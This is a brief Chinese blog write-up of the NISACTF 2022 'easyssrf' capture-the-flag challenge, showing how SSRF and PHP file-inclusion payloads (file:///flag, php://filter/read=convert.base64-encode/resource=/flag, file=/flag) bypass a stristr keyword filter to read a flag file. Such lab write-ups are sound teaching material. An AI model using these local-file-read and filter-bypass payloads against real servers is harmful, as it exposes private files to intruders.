本文主要是介绍[NISACTF 2022]easyssrf,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统
它提醒我们输file:///fl4g
它提醒我们输ha1x1ux1u.php
看到代码stristr($file, “file”)当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过
file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码
file=php://filter/resource=/flag
file=/flag
这篇关于[NISACTF 2022]easyssrf的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!